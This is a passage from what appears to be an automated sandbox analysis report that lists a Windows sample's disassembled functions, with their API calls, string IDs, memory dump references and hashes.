                                                            • Instruction Fuzzy Hash: AB31A035A002089FCB08EF68C885BBE7BB9FF44754F14802AE51AD7295DB71DD42C752
                                                            Function 00869471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                              • Part of subcall function 0086B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0086B0E7
                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 008694F6
                                                            • GetDlgCtrlID.USER32 ref: 00869501
                                                            • GetParent.USER32 ref: 0086951D
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00869520
                                                            • GetDlgCtrlID.USER32(?), ref: 00869529
                                                            • GetParent.USER32(?), ref: 00869545
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00869548
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1536045017-1403004172
                                                            • Opcode ID: edd40f1d0c052eba92e55826bfd0d5fa540a88c19d10aa30f32b366a97d2c9d9
                                                            • Instruction ID: 4fc10abad8aabc524df066b19b2a7c63c033abac3a24cdaf74a9c13d91242dc9
                                                            • Opcode Fuzzy Hash: edd40f1d0c052eba92e55826bfd0d5fa540a88c19d10aa30f32b366a97d2c9d9
                                                            • Instruction Fuzzy Hash: 6D21E270A00204BBCF05AB64CC85EFEBB79FF55300F10015AF662D72E2DB759959DA21
                                                            Function 0086955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                              • Part of subcall function 0086B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0086B0E7
                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008695DF
                                                            • GetDlgCtrlID.USER32 ref: 008695EA
                                                            • GetParent.USER32 ref: 00869606
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00869609
                                                            • GetDlgCtrlID.USER32(?), ref: 00869612
                                                            • GetParent.USER32(?), ref: 0086962E
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00869631
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1536045017-1403004172
                                                            • Opcode ID: 33d0687d648ec5c25c4575b7c8c6d8a046e3819da8e5bd5ae6a30fc5ed599fbd
                                                            • Instruction ID: 00a4b1d1c1d421f4cb1693670fa9262d82c480b2c02ef8a518aa9f045cb8a39e
                                                            • Opcode Fuzzy Hash: 33d0687d648ec5c25c4575b7c8c6d8a046e3819da8e5bd5ae6a30fc5ed599fbd
                                                            • Instruction Fuzzy Hash: 3221D670A00204BBDF05AB64CC85EFEBB78FF54300F150056F562D72E2DB759959DA21
                                                            Function 00869645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32 ref: 00869651
                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00869666
                                                            • _wcscmp.LIBCMT ref: 00869678
                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 008696F3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                            • API String ID: 1704125052-3381328864
                                                            • Opcode ID: d614c285f25c3ebc2a137482147d74de283c699b6e846f1f13cbcb2542f4db31
                                                            • Instruction ID: 004034b02532ea239d6ac28f5a1c410c0befeecb70dd54cd71f0c2b62c7a8e72
                                                            • Opcode Fuzzy Hash: d614c285f25c3ebc2a137482147d74de283c699b6e846f1f13cbcb2542f4db31
                                                            • Instruction Fuzzy Hash: 93114076248307FAFE052624EC0BDA6779CFB24374F21006BFA50E50D1FE71D9108699
                                                            Function 00888BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00888BEC
                                                            • CoInitialize.OLE32(00000000), ref: 00888C19
                                                            • CoUninitialize.OLE32 ref: 00888C23
                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00888D23
                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00888E50
                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,008A2C0C), ref: 00888E84
                                                            • CoGetObject.OLE32(?,00000000,008A2C0C,?), ref: 00888EA7
                                                            • SetErrorMode.KERNEL32(00000000), ref: 00888EBA
                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00888F3A
                                                            • VariantClear.OLEAUT32(?), ref: 00888F4A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                            • String ID:
                                                            • API String ID: 2395222682-0
                                                            • Opcode ID: af5d03c398ac6e569891228c3995ea08f33a6799c52b39696b91d0bdb4291d22
                                                            • Instruction ID: 501861a9c16891dc7ac04ad118b1164f89b5b355baa3c44870d26f58163861e7
                                                            • Opcode Fuzzy Hash: af5d03c398ac6e569891228c3995ea08f33a6799c52b39696b91d0bdb4291d22
                                                            • Instruction Fuzzy Hash: A8C10FB1208205EFD700EF68C88496ABBE9FF89348F44496DF58ADB251DB71ED05CB52
                                                            Function 00874189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __swprintf.LIBCMT ref: 0087419D
                                                            • __swprintf.LIBCMT ref: 008741AA
                                                              • Part of subcall function 008338D8: __woutput_l.LIBCMT ref: 00833931
                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 008741D4
                                                            • LoadResource.KERNEL32(?,00000000), ref: 008741E0
                                                            • LockResource.KERNEL32(00000000), ref: 008741ED
                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 0087420D
                                                            • LoadResource.KERNEL32(?,00000000), ref: 0087421F
                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0087422E
                                                            • LockResource.KERNEL32(?), ref: 0087423A
                                                            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0087429B
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                            • String ID:
                                                            • API String ID: 1433390588-0
                                                            • Opcode ID: 755e26c179cd513e24d9057b1c991bd2c99093622e3a22e0443119ddcd5370d8
                                                            • Instruction ID: 7e457e92a87b83fe1935c1b00cc19f5e6016df4803c72442bad59e2070123d19
                                                            • Opcode Fuzzy Hash: 755e26c179cd513e24d9057b1c991bd2c99093622e3a22e0443119ddcd5370d8
                                                            • Instruction Fuzzy Hash: C931907160521AABDB15AFA0EC44EBF7BADFF04301F048526F909D2152E770DA618BA1
                                                            Function 0081FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0081FC06
                                                            • OleUninitialize.OLE32(?,00000000), ref: 0081FCA5
                                                            • UnregisterHotKey.USER32(?), ref: 0081FDFC
                                                            • DestroyWindow.USER32(?), ref: 00854A00
                                                            • FreeLibrary.KERNEL32(?), ref: 00854A65
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00854A92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                            • String ID: close all
                                                            • API String ID: 469580280-3243417748
                                                            • Opcode ID: ad4225f94d87dafe7adcf246ad0672017b45af1cf8e6b2e47f63e9ce0e826bd2
                                                            • Instruction ID: 548aed764d10f28a33cb285f851013db55c79cf53083652d458f3669fda9b423
                                                            • Opcode Fuzzy Hash: ad4225f94d87dafe7adcf246ad0672017b45af1cf8e6b2e47f63e9ce0e826bd2
                                                            • Instruction Fuzzy Hash: FEA18E30701222CFCB19EF18D495AA9F768FF04715F1442ADE90AEB252DB30AD96CF95
                                                            Function 0086A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnumChildWindows.USER32(?,0086AA64), ref: 0086A9A2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ChildEnumWindows
                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                            • API String ID: 3555792229-1603158881
                                                            • Opcode ID: 4ff22dea8ceed63f97e27d67e74b909462f516edbc8ff549990a7a7184cd127d
                                                            • Instruction ID: e1cb9f4c35e99f1d6a140443b4780fd964d48af339ce26a35a1af10c69ed3f4e
                                                            • Opcode Fuzzy Hash: 4ff22dea8ceed63f97e27d67e74b909462f516edbc8ff549990a7a7184cd127d
                                                            • Instruction Fuzzy Hash: 3B916470500506EADB1CDF64C481BE9FB79FF44304F518129D59AF7251DB30A999CF92
                                                            Function 00812E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00812EAE
                                                              • Part of subcall function 00811DB3: GetClientRect.USER32(?,?), ref: 00811DDC
                                                              • Part of subcall function 00811DB3: GetWindowRect.USER32(?,?), ref: 00811E1D
                                                              • Part of subcall function 00811DB3: ScreenToClient.USER32(?,?), ref: 00811E45
                                                            • GetDC.USER32 ref: 0084CF82
                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0084CF95
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0084CFA3
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0084CFB8
                                                            • ReleaseDC.USER32(?,00000000), ref: 0084CFC0
                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0084D04B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                            • String ID: U
                                                            • API String ID: 4009187628-3372436214
                                                            • Opcode ID: f81e69b003207bf035653d3b5e78b49ad84864b5ae40f491432bb5ab055b0249
                                                            • Instruction ID: 7a3d613cc2e5a4a7251e2b931ed4a7417ee67093467a6185673ff29af9d8e621
                                                            • Opcode Fuzzy Hash: f81e69b003207bf035653d3b5e78b49ad84864b5ae40f491432bb5ab055b0249
                                                            • Instruction Fuzzy Hash: 7D71D23050120DDFCF219F68C880AEA7BBAFF49314F18426AED55DB266DB318C91DB61
                                                            Function 0089C27C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00812612: GetWindowLongW.USER32(?,000000EB), ref: 00812623
                                                              • Part of subcall function 00812344: GetCursorPos.USER32(?), ref: 00812357
                                                              • Part of subcall function 00812344: ScreenToClient.USER32(008D67B0,?), ref: 00812374
                                                              • Part of subcall function 00812344: GetAsyncKeyState.USER32(00000001), ref: 00812399
                                                              • Part of subcall function 00812344: GetAsyncKeyState.USER32(00000002), ref: 008123A7
                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0089C2E4
                                                            • ImageList_EndDrag.COMCTL32 ref: 0089C2EA
                                                            • ReleaseCapture.USER32 ref: 0089C2F0
                                                            • SetWindowTextW.USER32(?,00000000), ref: 0089C39A
                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0089C3AD
                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0089C48F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                            • API String ID: 1924731296-2107944366
                                                            • Opcode ID: eafa0a28ac4f0876e40763deefe1bfad7950f2bb9d42c98f168e42327b760416
                                                            • Instruction ID: a687deb2da8ad50cbe73227ab4ddd55df51c87aad275f5d11ca9f38cfce12d43
                                                            • Opcode Fuzzy Hash: eafa0a28ac4f0876e40763deefe1bfad7950f2bb9d42c98f168e42327b760416
                                                            • Instruction Fuzzy Hash: 3C516D70204345AFDB04EF24C896FAA7BE5FF88310F04462EF595CB2A2DB719958DB52
                                                            Function 00888F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0089F910), ref: 0088903D
                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0089F910), ref: 00889071
                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 008891EB
                                                            • SysFreeString.OLEAUT32(?), ref: 00889215
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                            • String ID:
                                                            • API String ID: 560350794-0
                                                            • Opcode ID: 2aa5c7a139d5e341f6ff2a4bc80844f8f67c72008d9d0f111b7dd1c02e9fa7c5
                                                            • Instruction ID: 90f677c2899096afed5e4767705f38033c9058e7dae97652e16951e4f9a11480
                                                            • Opcode Fuzzy Hash: 2aa5c7a139d5e341f6ff2a4bc80844f8f67c72008d9d0f111b7dd1c02e9fa7c5
                                                            • Instruction Fuzzy Hash: 0AF11675A00219EFCB04EF98C888EAEB7B9FF49314F148059F556EB291DB31AE45CB50
                                                            Function 0088F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 0088F9C9
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0088FB5C
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0088FB80
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0088FBC0
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0088FBE2
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0088FD5E
                                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0088FD90
                                                            • CloseHandle.KERNEL32(?), ref: 0088FDBF
                                                            • CloseHandle.KERNEL32(?), ref: 0088FE36
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                            • String ID:
                                                            • API String ID: 4090791747-0
                                                            • Opcode ID: c57988c646a3da193946a47750cf6cc2c403588a3e721e3da1080534c757a81c
                                                            • Instruction ID: 294c8111e5318820f1bd03cccf5fbca80ad3344af99918e2f5c6cd096b2064bc
                                                            • Opcode Fuzzy Hash: c57988c646a3da193946a47750cf6cc2c403588a3e721e3da1080534c757a81c
                                                            • Instruction Fuzzy Hash: CFE18E71204211DFCB24EF28C491A6ABBE5FF84354F14856DFA99DB2A2DB31DC44CB52
                                                            Function 00874F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008748AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008738D3,?), ref: 008748C7
                                                              • Part of subcall function 008748AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008738D3,?), ref: 008748E0
                                                              • Part of subcall function 00874CD3: GetFileAttributesW.KERNEL32(?,00873947), ref: 00874CD4
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00874FE2
                                                            • _wcscmp.LIBCMT ref: 00874FFC
                                                            • MoveFileW.KERNEL32(?,?), ref: 00875017
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                            • String ID:
                                                            • API String ID: 793581249-0
                                                            • Opcode ID: 4099481781de741d48f6ed6dcdd0ecf55cd79bd94c36ed1afd5816d985df0526
                                                            • Instruction ID: 19359e846ebfca08b52b20269cdeb585c765150d613b0368365d1b42bfd5c4e5
                                                            • Opcode Fuzzy Hash: 4099481781de741d48f6ed6dcdd0ecf55cd79bd94c36ed1afd5816d985df0526
                                                            • Instruction Fuzzy Hash: 0F513DB25087859BC724EB64D8819DBB3ECFF85301F00492EB289D7152EF75E2888767
                                                            Function 008988B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0089896E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID:
                                                            • API String ID: 634782764-0
                                                            • Opcode ID: a833c06ce2f9eb709d481eabac177d7a235bff5a17ad004939f3a22da94563b4
                                                            • Instruction ID: c27f3221581fd630668ff8fa7d844b59e30f91c05a204ec6787e4f5d135f4e73
                                                            • Opcode Fuzzy Hash: a833c06ce2f9eb709d481eabac177d7a235bff5a17ad004939f3a22da94563b4
                                                            • Instruction Fuzzy Hash: 5851D63060021AFFDF24BF28CC85BA97BA5FF06354F684122F515E65A1DF71A990CB52
                                                            Function 00812B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0084C547
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0084C569
                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0084C581
                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0084C59F
                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0084C5C0
                                                            • DestroyIcon.USER32(00000000), ref: 0084C5CF
                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0084C5EC
                                                            • DestroyIcon.USER32(?), ref: 0084C5FB
                                                              • Part of subcall function 0089A71E: DeleteObject.GDI32(00000000), ref: 0089A757
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                            • String ID:
